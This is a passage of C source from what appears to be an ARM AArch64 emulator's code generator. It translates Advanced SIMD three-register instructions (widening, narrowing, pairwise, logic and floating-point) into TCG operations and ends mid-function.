/* Emit a "long" add or subtract: tcg_res = tcg_op1 +/- tcg_op2, where each
 * i64 operand holds vector lanes twice the width selected by @size
 * (0: 16-bit lanes, 1: 32-bit lanes, 2: one plain 64-bit value).
 * @is_sub selects subtraction instead of addition.
 */
static void gen_neon_addl(TCGContext *tcg_ctx, int size, bool is_sub, TCGv_i64 tcg_res,
                          TCGv_i64 tcg_op1, TCGv_i64 tcg_op2)
{
    /* Dispatch table indexed [size][is_sub]; size 2 needs no helper,
     * it is just a full-width i64 add/sub.
     */
    static NeonGenTwo64OpFn * const fns[3][2] = {
        { gen_helper_neon_addl_u16, gen_helper_neon_subl_u16 },
        { gen_helper_neon_addl_u32, gen_helper_neon_subl_u32 },
        { tcg_gen_add_i64, tcg_gen_sub_i64 },
    };
    NeonGenTwo64OpFn *genfn;
    assert(size < 3);

    genfn = fns[size][is_sub];
    genfn(tcg_ctx, tcg_res, tcg_op1, tcg_op2);
}

/* Emit code for the 3-reg-different "widening" class (64 x 64 -> 128):
 * SADDL/SSUBL/SABAL/SABDL/SMLAL/SMLSL/SMULL, their unsigned variants
 * (@is_u) and the SQDML* saturating forms; @opcode selects the operation
 * and for the accumulating forms Vd is also read as an accumulator.
 */
static void handle_3rd_widening(DisasContext *s, int is_q, int is_u, int size,
                                int opcode, int rd, int rn, int rm)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    /* 3-reg-different widening insns: 64 x 64 -> 128 */
    TCGv_i64 tcg_res[2];
    int pass, accop;

    tcg_res[0] = tcg_temp_new_i64(tcg_ctx);
    tcg_res[1] = tcg_temp_new_i64(tcg_ctx);

    /* Does this op do an adding accumulate, a subtracting accumulate,
     * or no accumulate at all?
     */
    switch (opcode) {
    case 5:  /* SABAL */
    case 8:  /* SMLAL, UMLAL */
    case 9:  /* SQDMLAL */
        accop = 1;
        break;
    case 10: /* SMLSL, UMLSL */
    case 11: /* SQDMLSL */
        accop = -1;
        break;
    default:
        accop = 0;
        break;
    }

    if (accop != 0) {
        /* Accumulating ops read the previous 128-bit contents of Vd. */
        read_vec_element(s, tcg_res[0], rd, 0, MO_64);
        read_vec_element(s, tcg_res[1], rd, 1, MO_64);
    }

    /* size == 2 means two 32x32->64 operations; this is worth special
     * casing because we can generally handle it inline.
     */
    if (size == 2) {
        for (pass = 0; pass < 2; pass++) {
            TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx);
            TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx);
            TCGv_i64 tcg_passres;
            TCGMemOp memop = MO_32 | (is_u ?
0 : MO_SIGN); + + int elt = pass + is_q * 2; + + read_vec_element(s, tcg_op1, rn, elt, memop); + read_vec_element(s, tcg_op2, rm, elt, memop); + + if (accop == 0) { + tcg_passres = tcg_res[pass]; + } else { + tcg_passres = tcg_temp_new_i64(tcg_ctx); + } + + switch (opcode) { + case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ + tcg_gen_add_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + break; + case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ + tcg_gen_sub_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + break; + case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ + case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ + { + TCGv_i64 tcg_tmp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_tmp2 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_sub_i64(tcg_ctx, tcg_tmp1, tcg_op1, tcg_op2); + tcg_gen_sub_i64(tcg_ctx, tcg_tmp2, tcg_op2, tcg_op1); + tcg_gen_movcond_i64(tcg_ctx, is_u ? TCG_COND_GEU : TCG_COND_GE, + tcg_passres, + tcg_op1, tcg_op2, tcg_tmp1, tcg_tmp2); + tcg_temp_free_i64(tcg_ctx, tcg_tmp1); + tcg_temp_free_i64(tcg_ctx, tcg_tmp2); + break; + } + case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + case 12: /* UMULL, UMULL2, SMULL, SMULL2 */ + tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + break; + case 9: /* SQDMLAL, SQDMLAL2 */ + case 11: /* SQDMLSL, SQDMLSL2 */ + case 13: /* SQDMULL, SQDMULL2 */ + tcg_gen_mul_i64(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, + tcg_passres, tcg_passres); + break; + default: + g_assert_not_reached(); + } + + if (opcode == 9 || opcode == 11) { + /* saturating accumulate ops */ + if (accop < 0) { + tcg_gen_neg_i64(tcg_ctx, tcg_passres, tcg_passres); + } + gen_helper_neon_addl_saturate_s64(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, + tcg_res[pass], tcg_passres); + } else if (accop > 0) { + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); + } else if (accop < 0) { + tcg_gen_sub_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_passres); 
+ } + + if (accop != 0) { + tcg_temp_free_i64(tcg_ctx, tcg_passres); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } + } else { + /* size 0 or 1, generally helper functions */ + for (pass = 0; pass < 2; pass++) { + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + TCGv_i64 tcg_passres; + int elt = pass + is_q * 2; + + read_vec_element_i32(s, tcg_op1, rn, elt, MO_32); + read_vec_element_i32(s, tcg_op2, rm, elt, MO_32); + + if (accop == 0) { + tcg_passres = tcg_res[pass]; + } else { + tcg_passres = tcg_temp_new_i64(tcg_ctx); + } + + switch (opcode) { + case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ + case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ + { + TCGv_i64 tcg_op2_64 = tcg_temp_new_i64(tcg_ctx); + static NeonGenWidenFn * const widenfns[2][2] = { + { gen_helper_neon_widen_s8, gen_helper_neon_widen_u8 }, + { gen_helper_neon_widen_s16, gen_helper_neon_widen_u16 }, + }; + NeonGenWidenFn *widenfn = widenfns[size][is_u]; + + widenfn(tcg_ctx, tcg_op2_64, tcg_op2); + widenfn(tcg_ctx, tcg_passres, tcg_op1); + gen_neon_addl(tcg_ctx, size, (opcode == 2), tcg_passres, + tcg_passres, tcg_op2_64); + tcg_temp_free_i64(tcg_ctx, tcg_op2_64); + break; + } + case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ + case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ + if (size == 0) { + if (is_u) { + gen_helper_neon_abdl_u16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } else { + gen_helper_neon_abdl_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } + } else { + if (is_u) { + gen_helper_neon_abdl_u32(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } else { + gen_helper_neon_abdl_s32(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } + } + break; + case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + case 12: /* UMULL, UMULL2, SMULL, SMULL2 */ + if (size == 0) { + if (is_u) { + gen_helper_neon_mull_u8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } else { + gen_helper_neon_mull_s8(tcg_ctx, tcg_passres, 
tcg_op1, tcg_op2); + } + } else { + if (is_u) { + gen_helper_neon_mull_u16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } else { + gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + } + } + break; + case 9: /* SQDMLAL, SQDMLAL2 */ + case 11: /* SQDMLSL, SQDMLSL2 */ + case 13: /* SQDMULL, SQDMULL2 */ + assert(size == 1); + gen_helper_neon_mull_s16(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_passres, tcg_ctx->cpu_env, + tcg_passres, tcg_passres); + break; + case 14: /* PMULL */ + assert(size == 0); + gen_helper_neon_mull_p8(tcg_ctx, tcg_passres, tcg_op1, tcg_op2); + break; + default: + g_assert_not_reached(); + } + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + + if (accop != 0) { + if (opcode == 9 || opcode == 11) { + /* saturating accumulate ops */ + if (accop < 0) { + gen_helper_neon_negl_u32(tcg_ctx, tcg_passres, tcg_passres); + } + gen_helper_neon_addl_saturate_s32(tcg_ctx, tcg_res[pass], tcg_ctx->cpu_env, + tcg_res[pass], + tcg_passres); + } else { + gen_neon_addl(tcg_ctx, size, (accop < 0), tcg_res[pass], + tcg_res[pass], tcg_passres); + } + tcg_temp_free_i64(tcg_ctx, tcg_passres); + } + } + } + + write_vec_element(s, tcg_res[0], rd, 0, MO_64); + write_vec_element(s, tcg_res[1], rd, 1, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[0]); + tcg_temp_free_i64(tcg_ctx, tcg_res[1]); +} + +static void handle_3rd_wide(DisasContext *s, int is_q, int is_u, int size, + int opcode, int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 tcg_res[2]; + int part = is_q ? 
2 : 0;
    int pass;

    /* Two 64-bit passes: each pass reads one 64-bit half of Vn, widens the
     * matching narrow elements of Vm (upper half when is_q), and
     * adds/subtracts them via gen_neon_addl (opcode 3 selects subtract).
     */
    for (pass = 0; pass < 2; pass++) {
        TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx);
        TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx);
        TCGv_i64 tcg_op2_wide = tcg_temp_new_i64(tcg_ctx);
        /* Widening fns indexed [size][is_u]; size 2 is a plain i32->i64
         * sign/zero extend.
         */
        static NeonGenWidenFn * const widenfns[3][2] = {
            { gen_helper_neon_widen_s8, gen_helper_neon_widen_u8 },
            { gen_helper_neon_widen_s16, gen_helper_neon_widen_u16 },
            { tcg_gen_ext_i32_i64, tcg_gen_extu_i32_i64 },
        };
        NeonGenWidenFn *widenfn = widenfns[size][is_u];

        read_vec_element(s, tcg_op1, rn, pass, MO_64);
        read_vec_element_i32(s, tcg_op2, rm, part + pass, MO_32);
        widenfn(tcg_ctx, tcg_op2_wide, tcg_op2);
        tcg_temp_free_i32(tcg_ctx, tcg_op2);
        tcg_res[pass] = tcg_temp_new_i64(tcg_ctx);
        gen_neon_addl(tcg_ctx, size, (opcode == 3),
                      tcg_res[pass], tcg_op1, tcg_op2_wide);
        tcg_temp_free_i64(tcg_ctx, tcg_op1);
        tcg_temp_free_i64(tcg_ctx, tcg_op2_wide);
    }

    /* Write back both halves only after both passes, so rd == rn/rm is safe. */
    for (pass = 0; pass < 2; pass++) {
        write_vec_element(s, tcg_res[pass], rd, pass, MO_64);
        tcg_temp_free_i64(tcg_ctx, tcg_res[pass]);
    }
}

/* Narrow a 64-bit value to its high 32 bits (note: clobbers @in). */
static void do_narrow_high_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i64 in)
{
    tcg_gen_shri_i64(tcg_ctx, in, in, 32);
    tcg_gen_trunc_i64_i32(tcg_ctx, res, in);
}

/* As above, but rounding: add 1 << 31 before taking the high half. */
static void do_narrow_round_high_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i64 in)
{
    tcg_gen_addi_i64(tcg_ctx, in, in, 1U << 31);
    do_narrow_high_u32(tcg_ctx, res, in);
}

/* Emit code for the 3-reg-different "narrowing" class (128 x 128 -> 64):
 * ADDHN/SUBHN and their rounding variants (@is_u selects rounding,
 * opcode 6 selects subtract); is_q selects writing the high half of Vd.
 */
static void handle_3rd_narrowing(DisasContext *s, int is_q, int is_u, int size,
                                 int opcode, int rd, int rn, int rm)
{
    TCGContext *tcg_ctx = s->uc->tcg_ctx;
    TCGv_i32 tcg_res[2];
    int part = is_q ?
2 : 0; + int pass; + + for (pass = 0; pass < 2; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_wideres = tcg_temp_new_i64(tcg_ctx); + static NeonGenNarrowFn * const narrowfns[3][2] = { + { gen_helper_neon_narrow_high_u8, + gen_helper_neon_narrow_round_high_u8 }, + { gen_helper_neon_narrow_high_u16, + gen_helper_neon_narrow_round_high_u16 }, + { do_narrow_high_u32, do_narrow_round_high_u32 }, + }; + NeonGenNarrowFn *gennarrow = narrowfns[size][is_u]; + + read_vec_element(s, tcg_op1, rn, pass, MO_64); + read_vec_element(s, tcg_op2, rm, pass, MO_64); + + gen_neon_addl(tcg_ctx, size, (opcode == 6), tcg_wideres, tcg_op1, tcg_op2); + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + + tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); + gennarrow(tcg_ctx, tcg_res[pass], tcg_wideres); + tcg_temp_free_i64(tcg_ctx, tcg_wideres); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element_i32(s, tcg_res[pass], rd, pass + part, MO_32); + tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); + } + if (!is_q) { + clear_vec_high(s, rd); + } +} + +static void handle_pmull_64(DisasContext *s, int is_q, int rd, int rn, int rm) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* PMULL of 64 x 64 -> 128 is an odd special case because it + * is the only three-reg-diff instruction which produces a + * 128-bit wide result from a single operation. However since + * it's possible to calculate the two halves more or less + * separately we just use two helper calls. 
+ */ + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); + + read_vec_element(s, tcg_op1, rn, is_q, MO_64); + read_vec_element(s, tcg_op2, rm, is_q, MO_64); + gen_helper_neon_pmull_64_lo(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + write_vec_element(s, tcg_res, rd, 0, MO_64); + gen_helper_neon_pmull_64_hi(tcg_ctx, tcg_res, tcg_op1, tcg_op2); + write_vec_element(s, tcg_res, rd, 1, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_res); +} + +/* C3.6.15 AdvSIMD three different + * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 + * +---+---+---+-----------+------+---+------+--------+-----+------+------+ + * | 0 | Q | U | 0 1 1 1 0 | size | 1 | Rm | opcode | 0 0 | Rn | Rd | + * +---+---+---+-----------+------+---+------+--------+-----+------+------+ + */ +static void disas_simd_three_reg_diff(DisasContext *s, uint32_t insn) +{ + /* Instructions in this group fall into three basic classes + * (in each case with the operation working on each element in + * the input vectors): + * (1) widening 64 x 64 -> 128 (with possibly Vd as an extra + * 128 bit input) + * (2) wide 64 x 128 -> 128 + * (3) narrowing 128 x 128 -> 64 + * Here we do initial decode, catch unallocated cases and + * dispatch to separate functions for each class. 
+ */ + int is_q = extract32(insn, 30, 1); + int is_u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 12, 4); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + + switch (opcode) { + case 1: /* SADDW, SADDW2, UADDW, UADDW2 */ + case 3: /* SSUBW, SSUBW2, USUBW, USUBW2 */ + /* 64 x 128 -> 128 */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_3rd_wide(s, is_q, is_u, size, opcode, rd, rn, rm); + break; + case 4: /* ADDHN, ADDHN2, RADDHN, RADDHN2 */ + case 6: /* SUBHN, SUBHN2, RSUBHN, RSUBHN2 */ + /* 128 x 128 -> 64 */ + if (size == 3) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_3rd_narrowing(s, is_q, is_u, size, opcode, rd, rn, rm); + break; + case 14: /* PMULL, PMULL2 */ + if (is_u || size == 1 || size == 2) { + unallocated_encoding(s); + return; + } + if (size == 3) { + if (!arm_dc_feature(s, ARM_FEATURE_V8_PMULL)) { + unallocated_encoding(s); + return; + } + if (!fp_access_check(s)) { + return; + } + handle_pmull_64(s, is_q, rd, rn, rm); + return; + } + goto is_widening; + case 9: /* SQDMLAL, SQDMLAL2 */ + case 11: /* SQDMLSL, SQDMLSL2 */ + case 13: /* SQDMULL, SQDMULL2 */ + if (is_u || size == 0) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0: /* SADDL, SADDL2, UADDL, UADDL2 */ + case 2: /* SSUBL, SSUBL2, USUBL, USUBL2 */ + case 5: /* SABAL, SABAL2, UABAL, UABAL2 */ + case 7: /* SABDL, SABDL2, UABDL, UABDL2 */ + case 8: /* SMLAL, SMLAL2, UMLAL, UMLAL2 */ + case 10: /* SMLSL, SMLSL2, UMLSL, UMLSL2 */ + case 12: /* SMULL, SMULL2, UMULL, UMULL2 */ + /* 64 x 64 -> 128 */ + if (size == 3) { + unallocated_encoding(s); + return; + } + is_widening: + if (!fp_access_check(s)) { + return; + } + + handle_3rd_widening(s, is_q, is_u, size, opcode, rd, rn, rm); + break; + default: + /* opcode 15 not allocated */ + unallocated_encoding(s); + 
break; + } +} + +/* Logic op (opcode == 3) subgroup of C3.6.16. */ +static void disas_simd_3same_logic(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int rd = extract32(insn, 0, 5); + int rn = extract32(insn, 5, 5); + int rm = extract32(insn, 16, 5); + int size = extract32(insn, 22, 2); + bool is_u = extract32(insn, 29, 1); + bool is_q = extract32(insn, 30, 1); + TCGv_i64 tcg_op1, tcg_op2, tcg_res[2]; + int pass; + + if (!fp_access_check(s)) { + return; + } + + tcg_op1 = tcg_temp_new_i64(tcg_ctx); + tcg_op2 = tcg_temp_new_i64(tcg_ctx); + tcg_res[0] = tcg_temp_new_i64(tcg_ctx); + tcg_res[1] = tcg_temp_new_i64(tcg_ctx); + + for (pass = 0; pass < (is_q ? 2 : 1); pass++) { + read_vec_element(s, tcg_op1, rn, pass, MO_64); + read_vec_element(s, tcg_op2, rm, pass, MO_64); + + if (!is_u) { + switch (size) { + case 0: /* AND */ + tcg_gen_and_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 1: /* BIC */ + tcg_gen_andc_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 2: /* ORR */ + tcg_gen_or_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 3: /* ORN */ + tcg_gen_orc_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + } + } else { + if (size != 0) { + /* B* ops need res loaded to operate on */ + read_vec_element(s, tcg_res[pass], rd, pass, MO_64); + } + + switch (size) { + case 0: /* EOR */ + tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 1: /* BSL bitwise select */ + tcg_gen_xor_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_op2); + tcg_gen_and_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_res[pass]); + tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_op2, tcg_op1); + break; + case 2: /* BIT, bitwise insert if true */ + tcg_gen_xor_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_res[pass]); + tcg_gen_and_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_op2); + tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); + break; + case 3: /* BIF, bitwise insert if false */ + tcg_gen_xor_i64(tcg_ctx, tcg_op1, tcg_op1, 
tcg_res[pass]); + tcg_gen_andc_i64(tcg_ctx, tcg_op1, tcg_op1, tcg_op2); + tcg_gen_xor_i64(tcg_ctx, tcg_res[pass], tcg_res[pass], tcg_op1); + break; + } + } + } + + write_vec_element(s, tcg_res[0], rd, 0, MO_64); + if (!is_q) { + tcg_gen_movi_i64(tcg_ctx, tcg_res[1], 0); + } + write_vec_element(s, tcg_res[1], rd, 1, MO_64); + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + tcg_temp_free_i64(tcg_ctx, tcg_res[0]); + tcg_temp_free_i64(tcg_ctx, tcg_res[1]); +} + +/* Helper functions for 32 bit comparisons */ +static void gen_max_s32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i32 op1, TCGv_i32 op2) +{ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GE, res, op1, op2, op1, op2); +} + +static void gen_max_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i32 op1, TCGv_i32 op2) +{ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_GEU, res, op1, op2, op1, op2); +} + +static void gen_min_s32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i32 op1, TCGv_i32 op2) +{ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LE, res, op1, op2, op1, op2); +} + +static void gen_min_u32(TCGContext *tcg_ctx, TCGv_i32 res, TCGv_i32 op1, TCGv_i32 op2) +{ + tcg_gen_movcond_i32(tcg_ctx, TCG_COND_LEU, res, op1, op2, op1, op2); +} + +/* Pairwise op subgroup of C3.6.16. + * + * This is called directly or via the handle_3same_float for float pairwise + * operations where the opcode and size are calculated differently. + */ +static void handle_simd_3same_pair(DisasContext *s, int is_q, int u, int opcode, + int size, int rn, int rm, int rd) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_ptr fpst; + int pass; + + /* Floating point operations need fpst */ + if (opcode >= 0x58) { + fpst = get_fpstatus_ptr(tcg_ctx); + } else { + TCGV_UNUSED_PTR(fpst); + } + + if (!fp_access_check(s)) { + return; + } + + /* These operations work on the concatenated rm:rn, with each pair of + * adjacent elements being operated on to produce an element in the result. 
+ */ + if (size == 3) { + TCGv_i64 tcg_res[2]; + + for (pass = 0; pass < 2; pass++) { + TCGv_i64 tcg_op1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 tcg_op2 = tcg_temp_new_i64(tcg_ctx); + int passreg = (pass == 0) ? rn : rm; + + read_vec_element(s, tcg_op1, passreg, 0, MO_64); + read_vec_element(s, tcg_op2, passreg, 1, MO_64); + tcg_res[pass] = tcg_temp_new_i64(tcg_ctx); + + switch (opcode) { + case 0x17: /* ADDP */ + tcg_gen_add_i64(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + break; + case 0x58: /* FMAXNMP */ + gen_helper_vfp_maxnumd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x5a: /* FADDP */ + gen_helper_vfp_addd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x5e: /* FMAXP */ + gen_helper_vfp_maxd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x78: /* FMINNMP */ + gen_helper_vfp_minnumd(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x7e: /* FMINP */ + gen_helper_vfp_mind(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + default: + g_assert_not_reached(); + } + + tcg_temp_free_i64(tcg_ctx, tcg_op1); + tcg_temp_free_i64(tcg_ctx, tcg_op2); + } + + for (pass = 0; pass < 2; pass++) { + write_vec_element(s, tcg_res[pass], rd, pass, MO_64); + tcg_temp_free_i64(tcg_ctx, tcg_res[pass]); + } + } else { + int maxpass = is_q ? 4 : 2; + TCGv_i32 tcg_res[4]; + + for (pass = 0; pass < maxpass; pass++) { + TCGv_i32 tcg_op1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 tcg_op2 = tcg_temp_new_i32(tcg_ctx); + NeonGenTwoOpFn *genfn = NULL; + int passreg = pass < (maxpass / 2) ? rn : rm; + int passelt = (is_q && (pass & 1)) ? 
2 : 0; + + read_vec_element_i32(s, tcg_op1, passreg, passelt, MO_32); + read_vec_element_i32(s, tcg_op2, passreg, passelt + 1, MO_32); + tcg_res[pass] = tcg_temp_new_i32(tcg_ctx); + + switch (opcode) { + case 0x17: /* ADDP */ + { + static NeonGenTwoOpFn * const fns[3] = { + gen_helper_neon_padd_u8, + gen_helper_neon_padd_u16, + tcg_gen_add_i32, + }; + genfn = fns[size]; + break; + } + case 0x14: /* SMAXP, UMAXP */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_pmax_s8, gen_helper_neon_pmax_u8 }, + { gen_helper_neon_pmax_s16, gen_helper_neon_pmax_u16 }, + { gen_max_s32, gen_max_u32 }, + }; + genfn = fns[size][u]; + break; + } + case 0x15: /* SMINP, UMINP */ + { + static NeonGenTwoOpFn * const fns[3][2] = { + { gen_helper_neon_pmin_s8, gen_helper_neon_pmin_u8 }, + { gen_helper_neon_pmin_s16, gen_helper_neon_pmin_u16 }, + { gen_min_s32, gen_min_u32 }, + }; + genfn = fns[size][u]; + break; + } + /* The FP operations are all on single floats (32 bit) */ + case 0x58: /* FMAXNMP */ + gen_helper_vfp_maxnums(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x5a: /* FADDP */ + gen_helper_vfp_adds(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x5e: /* FMAXP */ + gen_helper_vfp_maxs(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x78: /* FMINNMP */ + gen_helper_vfp_minnums(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + case 0x7e: /* FMINP */ + gen_helper_vfp_mins(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2, fpst); + break; + default: + g_assert_not_reached(); + } + + /* FP ops called directly, otherwise call now */ + if (genfn) { + genfn(tcg_ctx, tcg_res[pass], tcg_op1, tcg_op2); + } + + tcg_temp_free_i32(tcg_ctx, tcg_op1); + tcg_temp_free_i32(tcg_ctx, tcg_op2); + } + + for (pass = 0; pass < maxpass; pass++) { + write_vec_element_i32(s, tcg_res[pass], rd, pass, MO_32); + tcg_temp_free_i32(tcg_ctx, tcg_res[pass]); + } + if (!is_q) { + clear_vec_high(s, rd); + } + } + + if 
(!TCGV_IS_UNUSED_PTR(fpst)) { + tcg_temp_free_ptr(tcg_ctx, fpst); + } +} + +/* Floating point op subgroup of C3.6.16. */ +static void disas_simd_3same_float(DisasContext *s, uint32_t insn) +{ + /* For floating point ops, the U, size[1] and opcode bits + * together indicate the operation. size[0] indicates single + * or double. + */ + int fpopcode = extract32(insn, 11, 5) + | (extract32(insn, 23, 1) << 5) + | (extract32(insn, 29, 1) << 6); + int is_q = extract32(insn, 30, 1); + int size = extract32(insn, 22, 1); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + + int datasize = is_q ? 128 : 64; + int esize = 32 << size; + int elements = datasize / esize; + + if (size == 1 && !is_q) { + unallocated_encoding(s); + return; + } + + switch (fpopcode) { + case 0x58: /* FMAXNMP */ + case 0x5a: /* FADDP */ + case 0x5e: /* FMAXP */ + case 0x78: /* FMINNMP */ + case 0x7e: /* FMINP */ + if (size && !is_q) { + unallocated_encoding(s); + return; + } + handle_simd_3same_pair(s, is_q, 0, fpopcode, size ? MO_64 : MO_32, + rn, rm, rd); + return; + case 0x1b: /* FMULX */ + case 0x1f: /* FRECPS */ + case 0x3f: /* FRSQRTS */ + case 0x5d: /* FACGE */ + case 0x7d: /* FACGT */ + case 0x19: /* FMLA */ + case 0x39: /* FMLS */ + case 0x18: /* FMAXNM */ + case 0x1a: /* FADD */ + case 0x1c: /* FCMEQ */ + case 0x1e: /* FMAX */ + case 0x38: /* FMINNM */ + case 0x3a: /* FSUB */ + case 0x3e: /* FMIN */ + case 0x5b: /* FMUL */ + case 0x5c: /* FCMGE */ + case 0x5f: /* FDIV */ + case 0x7a: /* FABD */ + case 0x7c: /* FCMGT */ + if (!fp_access_check(s)) { + return; + } + + handle_3same_float(s, size, elements, fpopcode, rd, rn, rm); + return; + default: + unallocated_encoding(s); + return; + } +} + +/* Integer op subgroup of C3.6.16. 
*/ +static void disas_simd_3same_int(DisasContext *s, uint32_t insn) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + int is_q = extract32(insn, 30, 1); + int u = extract32(insn, 29, 1); + int size = extract32(insn, 22, 2); + int opcode = extract32(insn, 11, 5); + int rm = extract32(insn, 16, 5); + int rn = extract32(insn, 5, 5); + int rd = extract32(insn, 0, 5); + int pass; + + switch (opcode) { + case 0x13: /* MUL, PMUL */ + if (u && size != 0) { + unallocated_encoding(s); + return; + } + /* fall through */ + case 0x0: /* SHADD, UHADD */ + case 0x2: /* SRHADD, URHADD */ + case 0x4: /* SHSUB, UHSUB */ + case 0xc: /* SMAX, UMAX */ + case 0xd: /* SMIN, UMIN */ + case 0xe: /* SABD, UABD */ + case 0xf: /* SABA, UABA */ + case 0x12: /* MLA, MLS */ + if (size == 3) { + unallocated_encoding(s); + return; + } + break; + case 0x16: /* SQDMULH, SQRDMULH */ + if (size == 0 || size == 3) { + unallocated_encoding(s); + return; + } + break; + default: + if (size == 3 && !is_q) { 